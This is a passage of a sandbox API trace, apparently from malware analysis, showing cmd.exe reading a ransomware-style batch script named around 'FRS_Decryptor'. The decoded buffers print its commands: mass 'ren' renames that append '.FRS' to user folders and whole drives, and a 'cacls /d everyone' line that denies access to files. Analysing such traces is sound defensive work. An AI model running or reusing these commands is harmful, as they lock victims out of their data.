lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0120.190] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.190] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.190] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.190] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.190] GetFileType (hFile=0x24c) returned 0x1 [0120.190] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.190] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.190] SetFilePointer (in: hFile=0x24c, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0120.190] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0120.190] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0120.190] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.190] GetFileType (hFile=0x24c) returned 0x1 [0120.190] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0120.190] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.190] SetFilePointer (in: hFile=0x24c, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0120.190] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0120.190] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0120.190] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.190] GetFileType (hFile=0x24c) returned 0x1 [0120.190] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0120.190] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.190] SetFilePointer (in: hFile=0x24c, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0120.190] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0120.190] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0120.190] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.190] GetFileType (hFile=0x24c) returned 0x1 [0120.190] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0120.190] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0120.191] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0120.191] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.191] GetFileType (hFile=0x24c) returned 0x1 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0120.191] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0120.191] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0120.191] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.191] GetFileType (hFile=0x24c) returned 0x1 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0120.191] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0120.191] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0120.191] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.191] GetFileType (hFile=0x24c) returned 0x1 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0120.191] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0120.191] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0120.191] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.191] GetFileType (hFile=0x24c) returned 0x1 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0120.191] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.191] SetFilePointer (in: hFile=0x24c, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0120.191] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0120.192] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.192] GetFileType (hFile=0x24c) returned 0x1 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0120.192] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.192] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.192] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.192] GetFileType (hFile=0x24c) returned 0x1 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.192] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0120.192] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0120.192] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.192] GetFileType (hFile=0x24c) returned 0x1 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0120.192] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0120.192] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0120.192] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.192] GetFileType (hFile=0x24c) returned 0x1 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0120.192] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0120.192] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0120.192] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0120.192] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.192] GetFileType (hFile=0x24c) returned 0x1 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0120.193] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0120.193] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0120.193] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.193] GetFileType (hFile=0x24c) returned 0x1 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0120.193] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0120.193] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0120.193] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.193] GetFileType (hFile=0x24c) returned 0x1 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0120.193] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0120.193] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0120.193] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.193] GetFileType (hFile=0x24c) returned 0x1 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0120.193] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0120.193] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0120.193] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.193] GetFileType (hFile=0x24c) returned 0x1 [0120.193] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0120.194] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0120.194] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0120.194] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.194] GetFileType (hFile=0x24c) returned 0x1 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0120.194] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0120.194] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0120.194] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.194] GetFileType (hFile=0x24c) returned 0x1 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0120.194] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0120.194] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0120.194] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.194] GetFileType (hFile=0x24c) returned 0x1 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0120.194] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0120.194] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0120.194] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.194] GetFileType (hFile=0x24c) returned 0x1 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0120.194] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.194] SetFilePointer (in: hFile=0x24c, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0120.195] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0120.195] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.195] GetFileType (hFile=0x24c) returned 0x1 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0120.195] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0120.195] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0120.195] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.195] GetFileType (hFile=0x24c) returned 0x1 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0120.195] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0120.195] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: 